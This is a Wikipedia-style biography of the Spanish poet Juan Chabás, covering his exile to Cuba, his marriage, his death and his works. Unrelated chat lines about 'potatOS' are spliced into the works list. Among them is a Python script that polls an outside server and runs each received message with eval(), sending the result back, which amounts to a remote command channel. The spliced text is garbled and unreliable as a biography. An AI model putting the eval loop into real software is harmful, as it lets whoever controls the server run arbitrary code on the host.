Juan Chabás

Juan Chabás (September 10, 1910, Dénia – October 29, 1954) was a Spanish-born poet and writer. He was a member of the influential group of writers known as the Generation of '27. He fled to exile in Cuba following the Spanish Civil War.

In 1938, he met French journalist Simone Téry, whom he married in 1938. [1]:113 They would later divorce.

Juan Chabás died of a heart attack at age 44 in Santiago de Cuba and is buried in the Colon Cemetery, Havana.

Works

  • Espejos 1919-verso-1920 (1921),
  • Sin velas desvelada, (1927),
  • Puerto de sombra, (1928),
  • Italia fascista (1929),
  • Vuelo y estilo (1930),
  • Agor sin fin, (1930),
  • Historia de la literatura española (1932),
  • Literatura española contemporánea (1898–1950) (1952),
  • Fábula y vida, (1955),
  • Árbol de ti nacido (1956).
gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.

References

  1. Malgat, Gérard; Maurice, Jacques (2007). Max Aub y Francia o la esperanza traicionada (in Spanish). Editorial Renacimiento. ISBN 9788484722922.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.